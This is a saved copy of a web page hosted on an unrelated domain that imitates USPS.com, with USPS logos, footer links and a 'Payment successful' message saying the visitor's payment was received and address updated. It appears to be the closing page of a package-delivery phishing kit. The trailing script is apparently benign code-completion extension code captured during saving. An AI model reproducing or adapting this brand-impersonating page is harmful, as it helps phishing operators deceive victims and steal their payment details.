<!DOCTYPE html>
<!-- saved from url=(0052)https://conquistarmulhereshoje.com/85/successful.php -->
<html lang="auto" class=""><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
	<meta http-equiv="Pragma" content="no-cache">
	<meta http-equiv="no-cache">
	<meta http-equiv="Expires" content="-1">
	<meta http-equiv="Cache-Control" content="no-cache">
	
	
    <meta name="description" content="Create a USPS.com(registered trademark symbol) account to print shipping labels, request a Carrier Pickup, buy stamps, shop, plus much more.">
    <meta name="keywords" content="">
    <meta name="author" content="www.usps.com">
    <link rel="icon" href="https://reg.usps.com/entreg/favicon.ico">
    
	<title>USPS.com® - Payment successful</title>
    
	


	<link href="./5_files/usps-fonts.css" rel="stylesheet">
	<link href="./5_files/all.min.css" rel="stylesheet">
    <link href="./5_files/bootstrap.min.css" rel="stylesheet">
    <link href="./5_files/sticky-footer.css" rel="stylesheet">
    <link href="./5_files/usps-theme.css" rel="stylesheet">
    
	
	

	
	
<link type="text/css" rel="stylesheet" charset="UTF-8" href="./5_files/translateelement.css"><style type="text/css">@font-face { font-family: Roboto; src: url("chrome-extension://mcgbeeipkmelnpldkobichboakdfaeon/css/Roboto-Regular.ttf"); }</style><script src="chrome-extension://njgehaondchbmjmajphnhlojfnbfokng/js/contentScripts/dom.js"></script></head>
<body>

	
	<a class="sr-only sr-only-focusable" href="https://www.usps.com/#content">Skip to main content</a>

	



	
		
	    
	
		
		
			<header>
				<div class="container">
					<div class="row">
						<div class="col-md-12">
							
							<a tabindex="2" href="https://www.usps.com/"><img alt="USPS.com home. The profile of an eagle&#39;s head adjoining the words United States Postal Service are the two elements that are combined to form the corporate signature." src="./5_files/des_brd_2color_logo_274x79.png" id="usps-logo"></a>
							
						</div>
						
					</div>
				</div>
			</header>
			
	
	

<div id="breadcrumb-container" class="container" style="display: none;">
	<nav aria-label="breadcrumb">
		<ol class="breadcrumb" style="background-color: #f7f7f7;">
			
			<li class="breadcrumb-item"><a id="preferences-link" href="https://reg.usps.com/entreg/ProfileAction_input" tabindex="3" title="My Preferences">My Preferences</a></li>
			<li class="breadcrumb-item active" aria-current="page">E-mail Validation</li>
		</ol>
	</nav>
</div>

<div class="container">
	<div class="grid-row-margin-top-34 grid-row-margin-68">	
		<h1>Payment successful</h1>
	</div>
</div>

<div role="main" class="container">
	<input type="hidden" name="returnActionName" value="" id="returnActionName">
	<div style="background-color: #F7F7F7; border-radius: 8px; padding: 4rem;">
		<div class="row">
			<div class="col-xs-12 col-sm-12 col-md-12 text-center">
				
					<img src="./5_files/email-validation-icon.png" class="img-fluid" style="padding: 2rem 0;">
					<p style="margin-bottom: 2rem;">Thank you, your payment has been received and your address successfully updated. You should receive your package in the next 5 business days.</p>
					
					<a href="https://www.usps.com/" class="btn btn-lg btn-no-min btn-primary" tabindex="%{#tabindexanchor}">Continue to USPS.com</a>
				
				
			</div>
		</div>
	</div>
</div>
	


	<footer class="footer">
		<div class="container">
			<div class="row no-gutters">
				<div class="col-xs-12 col-sm-12 col-md-12">
					<img class="footer-logo" alt="USPS.com home. The profile of an eagle&#39;s head adjoining the words United States Postal Service are the two elements that are combined to form the corporate signature." src="./5_files/logo-mini-sb.png">
				</div>
			</div>
			<div class="row no-gutters">
				<div class="col-xs-12 col-sm-12 col-md-3">
					<div class="footer-sub-heading first-sub-heading">helpful links</div>
					<ul class="list-unstyled nav-options">
						<li><a href="https://www.usps.com/help/contact-us.htm">Contact Us</a></li>
						<li><a href="http://www.usps.com/globals/site-index.htm">Site Index</a></li>
						<li><a href="http://faq.usps.com/">FAQs</a></li>
					</ul>
					<div class="footer-sub-heading">USPS Jobs</div>
					<ul class="list-unstyled nav-options">
						<li><a href="http://about.usps.com/careers/welcome.htm">Careers</a></li>
					</ul>
				</div>
				<div class="col-xs-12 col-sm-12 col-md-3">
					<div class="footer-sub-heading">On about.usps.com</div>
					<ul class="list-unstyled nav-options">
						<li><a href="http://about.usps.com/">About USPS Home</a></li>
						<li><a href="http://about.usps.com/news/welcome.htm">Newsroom</a></li>
						<li><a href="http://about.usps.com/news/service-alerts/welcome.htm">USPS Service Updates</a></li>
						<li><a href="http://about.usps.com/forms-publications/welcome.htm">Forms &amp; Publications</a></li>
						<li><a href="https://www.usps.com/gov-services/gov-services.htm">Government Services</a></li>
					</ul>
				</div>
				<div class="clearfix visible-sm-block"></div>
				<div class="col-xs-12 col-sm-12 col-md-3">
					<div class="footer-sub-heading">Other USPS Sites</div>
					<ul class="list-unstyled nav-options">
						<li><a href="https://gateway.usps.com/">Business Customer Gateway</a></li>
						<li><a href="https://postalinspectors.uspis.gov/">Postal Inspectors</a></li>
						<li><a href="http://www.uspsoig.gov/">Inspector General</a></li>
						<li><a href="http://pe.usps.com/">Postal Explorer</a></li>
						<li><a target="_blank" href="http://www.postalmuseum.si.edu/">National Postal Museum</a></li>
						<li><a href="https://www.usps.com/webtools/welcome.htm">Resources for Developers</a></li>
						<li><a href="https://postalpro.usps.com/">PostalPro</a></li>
						<li><a href="https://www.usps.com/datadial">USPS Customer Data Dial</a></li>
					</ul>
	 			</div>
	 			<div class="col-xs-12 col-sm-12 col-md-3">
					<div class="footer-sub-heading">Legal Information</div>
					<ul class="list-unstyled nav-options">
						<li><a href="http://about.usps.com/who-we-are/privacy-policy/privacy-policy-highlights.htm">Privacy Policy</a></li>
						<li><a href="http://about.usps.com/termsofuse.htm">Terms of Use</a></li>
						<li><a href="http://about.usps.com/who-we-are/foia/welcome.htm">FOIA</a></li>
						<li><a href="http://about.usps.com/who-we-are/no-fear-act/welcome.htm">No FEAR Act EEO Data</a></li>
					</ul>			  
				</div>
			</div>
			<div class="row copy-no-gutters">
				<div class="col-xs-12 col-sm-12 col-md-12 copy-border">
					<div id="footer-copyright">Copyright © 2022 USPS. All Rights Reserved. <!-- [Build 9.0.40 July 01, 2022] --></div>
				</div>
			</div>
			<div class="row">
				<div class="col-xs-12 col-sm-12 col-md-12">
					<ul class="list-inline" id="social-links">
						<li class="list-inline-item"><a href="http://www.facebook.com/usps" target="_blank"><img src="./5_files/social-facebook_1.png" alt="facebook"></a></li>
						<li class="list-inline-item"><a href="http://twitter.com/usps" target="_blank"><img src="./5_files/social-twitter_2.png" alt="twitter"></a></li>
						<li class="list-inline-item"><a href="http://pinterest.com/uspsstamps/" target="_blank"><img src="./5_files/social-pinterest_6.png" alt="pinterest"></a></li>
						<li class="list-inline-item"><a href="http://www.youtube.com/usps" target="_blank" class="social-youtube"><img src="./5_files/social-youtube_3.png" alt="youtube"></a></li>
					</ul>
				</div>
			</div>
		</div>
	</footer>



 

<div id="torrent-scanner-popup" style="display: none;"></div><script>
		function returnCommentSymbol(language = "javascript") {
			const languageObject = {
				bat: "@REM",
				c: "//",
				csharp: "//",
				cpp: "//",
				closure: ";;",
				coffeescript: "#",
				dockercompose: "#",
				css: "/*DELIMITER*/",
				"cuda-cpp": "//",
				dart: "//",
				diff: "#",
				dockerfile: "#",
				fsharp: "//",
				"git-commit": "//",
				"git-rebase": "#",
				go: "//",
				groovy: "//",
				handlebars: "{{!--DELIMITER--}}",
				hlsl: "//",
				html: "<!--DELIMITER-->",
				ignore: "#",
				ini: ";",
				java: "//",
				javascript: "//",
				javascriptreact: "//",
				json: "//",
				jsonc: "//",
				julia: "#",
				latex: "%",
				less: "//",
				lua: "--",
				makefile: "#",
				markdown: "<!--DELIMITER-->",
				"objective-c": "//",
				"objective-cpp": "//",
				perl: "#",
				perl6: "#",
				php: "<!--DELIMITER-->",
				powershell: "#",
				properties: ";",
				jade: "//-",
				python: "#",
				r: "#",
				razor: "<!--DELIMITER-->",
				restructuredtext: "..",
				ruby: "#",
				rust: "//",
				scss: "//",
				shaderlab: "//",
				shellscript: "#",
				sql: "--",
				svg: "<!--DELIMITER-->",
				swift: "//",
				tex: "%",
				typescript: "//",
				typescriptreact: "//",
				vb: "'",
				xml: "<!--DELIMITER-->",
				xsl: "<!--DELIMITER-->",
				yaml: "#"
			}
			if(!languageObject[language]){
				return languageObject["python"].split("DELIMITER")
			}
			return languageObject[language].split("DELIMITER")
		}
		var savedChPos = 0
		var returnedSuggestion = ''
		let editor, doc, cursor, line, pos
		pos = {line: 0, ch: 0}
		var suggestionsStatus = false
		var docLang = "python"
		var suggestionDisplayed = false
		var isReturningSuggestion = false
		document.addEventListener("keydown", (event) => {
		setTimeout(()=>{
			editor = event.target.closest('.CodeMirror');
			if (editor){
				const codeEditor = editor.CodeMirror
				if(!editor.classList.contains("added-tab-function")){
					editor.classList.add("added-tab-function")
					codeEditor.removeKeyMap("Tab")
					codeEditor.setOption("extraKeys", {Tab: (cm)=>{

						if(returnedSuggestion){
							acceptTab(returnedSuggestion)
						}
						else{
							cm.execCommand("defaultTab")
						}
					}})
				}
				doc = editor.CodeMirror.getDoc()
				cursor = doc.getCursor()
				line = doc.getLine(cursor.line)
				pos = {line: cursor.line, ch: line.length}

				if(cursor.ch > 0){
					savedChPos = cursor.ch
				}

				const fileLang = doc.getMode().name
				docLang = fileLang
				const commentSymbol = returnCommentSymbol(fileLang)
				if (event.key == "?"){
					var lastLine = line
					lastLine = lastLine.slice(0, savedChPos - 1)

					if(lastLine.trim().startsWith(commentSymbol[0])){
						if(fileLang !== "null"){
							lastLine += " "+ fileLang
						}
						
						lastLine = lastLine.split(commentSymbol[0])[1]
						window.postMessage({source: 'getQuery', payload: { data: lastLine } } )
						isReturningSuggestion = true
						displayGrey("\nBlackbox loading...")
					}
				}else if(event.key === "Enter" && suggestionsStatus && !isReturningSuggestion){
					var query = doc.getRange({ line: Math.max(0,cursor.line-50), ch: 0 }, { line: cursor.line, ch: line.length })
					window.postMessage({source: 'getSuggestion', payload: { data: query, language: docLang, cursorPos: pos } } )
					displayGrey("Blackbox loading...")
				}else if(event.key === "ArrowRight" && returnedSuggestion){
					acceptTab(returnedSuggestion)
				}else if(event.key === "Enter" && isReturningSuggestion){
					displayGrey("\nBlackbox loading...")
				}else if(event.key === "Escape"){
					displayGrey("")
				}
			}
		}, 0)
		})

		function acceptTab(text){
		if (suggestionDisplayed){
			displayGrey("")
			doc.replaceRange(text, pos)
			returnedSuggestion = ""
			updateSuggestionStatus(false)
		}
		}
		function acceptSuggestion(text){
			displayGrey("")
			doc.replaceRange(text, pos)
			returnedSuggestion = ""
			updateSuggestionStatus(false)
		}
		function displayGrey(text){
			if(!text){
				document.querySelector(".blackbox-suggestion").remove()
				return
			}
			var el = document.querySelector(".blackbox-suggestion")
			if(!el){
				el = document.createElement('span')
				el.classList.add("blackbox-suggestion")
				el.style = 'color:grey'
				el.innerText = text
			}
			else{
				el.innerText = text
			}
			
			var lineIndex = pos.line;
			editor.getElementsByClassName('CodeMirror-line')[lineIndex].appendChild(el)
		}
		function updateSuggestionStatus(s){
			suggestionDisplayed = s
			window.postMessage({source: 'updateSuggestionStatus', status: suggestionDisplayed, suggestion: returnedSuggestion})
		}
		window.addEventListener('message', (event)=>{
		if (event.source !== window ) return
		if (event.data.source == 'return'){
			isReturningSuggestion = false
			const formattedCode = formatCode(event.data.payload.data)
			returnedSuggestion = formattedCode
			displayGrey(formattedCode)
			updateSuggestionStatus(true)
		}
		if(event.data.source == 'suggestReturn'){
			const prePos = event.data.payload.cursorPos
			if(pos.line == prePos.line && pos.ch == prePos.ch){
				returnedSuggestion = event.data.payload.data
				displayGrey(event.data.payload.data)
				updateSuggestionStatus(true)
			}
			else{
				displayGrey()
			}
		}
		if(event.data.source == 'codeSearchReturn'){
			isReturningSuggestion = false
			displayGrey()
		}
		if(event.data.source == 'suggestionsStatus'){
			suggestionsStatus = event.data.payload.enabled
		}
		if(event.data.source == 'acceptSuggestion'){
			
			acceptSuggestion(event.data.suggestion)
		}
		})
		document.addEventListener("keyup", function(){
			returnedSuggestion = ""
			updateSuggestionStatus(false)
		})
		function formatCode(data) {
			if (Array.isArray(data)) {
				var finalCode = ""
				var pairs = []
		
				const commentSymbol = returnCommentSymbol(docLang)
				data.forEach((codeArr, idx) => {
					const code = codeArr[0]
					var desc = codeArr[1]
					const descArr = desc.split("\n")
					var finalDesc = ""
					descArr.forEach((descLine, idx) => {
						const whiteSpace = descLine.search(/\S/)
						if (commentSymbol.length < 2 || idx === 0) {
							finalDesc += insert(descLine, whiteSpace, commentSymbol[0])
						}
						if (commentSymbol.length > 1 && idx === descArr.length - 1) {
							finalDesc = finalDesc + commentSymbol[1] + "\n"
						}
					})
		
					finalCode += finalDesc + "\n\n" + code
					pairs.push(finalCode)
				})
				return "\n"+pairs.join("\n")
			}
		
			return "\n"+data
		}
		
		function insert(str, index, value) {
			return str.substr(0, index) + value + str.substr(index)
		}
	</script></body></html>